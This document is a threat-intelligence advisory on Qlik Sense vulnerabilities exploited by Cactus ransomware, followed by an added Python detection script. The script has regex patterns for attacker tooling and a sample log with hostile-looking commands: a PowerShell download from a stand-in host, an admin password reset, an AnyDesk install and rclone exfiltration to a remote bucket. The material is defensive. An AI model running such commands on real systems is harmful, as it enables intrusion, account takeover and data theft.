Advisory December 1, 2023

Critical Security Vulnerabilities in Qlik Sense Exploited by Cactus Ransomware

The Obrela Threat Intelligence Team

Overview:

Recent reports indicate that the Cactus ransomware threat actor has actively exploited three critical vulnerabilities in Qlik Sense Enterprise for Windows. The vulnerabilities—CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365—were discovered by Praetorian, disclosed in August and September, and subsequently patched by Qlik.

Exploited Vulnerabilities:

  1. CVE-2023-41266 (CVSS score: 9.9): A path traversal issue enabling remote, unauthenticated attackers to generate anonymous sessions and send HTTP requests to unauthorized endpoints.
  2. CVE-2023-41265 (CVSS score: 6.5): An HTTP tunneling flaw exploitable to elevate privileges and execute HTTP requests on backend servers, allowing remote, unauthenticated hackers to execute arbitrary code and add new admin users.
  3. CVE-2023-48365 (CVSS score: 9.9): An unauthenticated remote code execution vulnerability resulting from an incomplete patch for CVE-2023-41265.

Exploitation Tactics:

After gaining initial access to targeted systems, the threat actors were observed undertaking various malicious activities, including downloading tools via PowerShell and BITS, uninstalling security software, changing admin account passwords, installing remote access software (i.e., AnyDesk), utilizing RDP and Plink for lateral movement, and exfiltrating data to cloud storage services via rclone. In some instances, the attackers attempted to deploy the Cactus ransomware.

Cactus Ransomware Campaign:

The Cactus ransomware has been active since March 2023, targeting major organizations. The threat actor exploits vulnerabilities, initially in VPN appliances and now in Qlik Sense, for initial access.

Recommendations:

  • Patch Management: Ensure all Qlik Sense Enterprise for Windows installations are updated with the latest patches released by Qlik in August and September 2023.
  • Security Measures: Consider reinforcing security measures, including reviewing and enhancing network segmentation, monitoring for unusual activities, and conducting thorough security audits.
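The post-exploitation chain described under Exploitation Tactics, together with the monitoring recommendation above, can be turned into a simple per-host correlation rule. The following is an added example, not code from the advisory or from Obrela; the flat log format, the indicator regexes and the host names are constructed assumptions, and the point is that several stages on one host inside a day are reported rather than any single command.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Stage indicators for the post-exploitation chain described above. The regexes and
# the flat log format are assumptions for illustration, not vendor-published signatures.
STAGE_PATTERNS = {
    "tool_download":    re.compile(r"bitsadmin|Start-BitsTransfer|Invoke-WebRequest|DownloadFile", re.I),
    "password_change":  re.compile(r"\bnet\s+user\s+\S+\s+\S+", re.I),
    "remote_access":    re.compile(r"anydesk", re.I),
    "lateral_movement": re.compile(r"\b(plink|mstsc)\b", re.I),
    "exfiltration":     re.compile(r"\brclone\b", re.I),
}
# Assumed log line format: "<ISO timestamp> host=<name> user=<name> cmd=<command line>"
LINE_RE = re.compile(r"^(\S+)\s+host=(\S+)\s+user=(\S+)\s+cmd=(.*)$")

def parse_line(line):
    """Return (timestamp, host, stage) for a line that matches a stage, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    for stage, pat in STAGE_PATTERNS.items():
        if pat.search(m.group(4)):
            return datetime.fromisoformat(m.group(1)), m.group(2), stage
    return None

def correlate(lines, min_stages=3, window=timedelta(hours=24)):
    """Flag hosts on which >= min_stages distinct stages occur inside one `window`."""
    by_host = defaultdict(list)
    for line in lines:
        hit = parse_line(line)
        if hit:
            ts, host, stage = hit
            by_host[host].append((ts, stage))
    flagged = {}
    for host, events in by_host.items():
        events.sort()  # chronological, so a window is a contiguous run from each start
        for i, (start, _) in enumerate(events):
            stages = {s for t, s in events[i:] if t - start <= window}
            if len(stages) >= min_stages:
                flagged[host] = sorted(stages)
                break
    return flagged

# Constructed sample log: one host shows the chain, another shows a single benign-looking hit.
SAMPLE_LOG = """\
2023-11-20T10:01:00 host=QLIK-SRV01 user=SYSTEM cmd=powershell -c Invoke-WebRequest https://example.com/t.zip -OutFile C:\\Temp\\t.zip
2023-11-20T10:04:00 host=QLIK-SRV01 user=SYSTEM cmd=net user Administrator PLACEHOLDER-PW
2023-11-20T10:09:00 host=QLIK-SRV01 user=SYSTEM cmd=C:\\Temp\\AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent
2023-11-20T11:30:00 host=QLIK-SRV01 user=SYSTEM cmd=rclone copy D:\\Share remote:bucket
2023-11-20T09:00:00 host=FILE-SRV02 user=jdoe cmd=net user jdoe NewPass1
""".splitlines()
```

Raising `min_stages` or shrinking `window` trades recall for precision; an isolated `net user` on FILE-SRV02 is not reported, while QLIK-SRV01 is flagged with four distinct stages.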
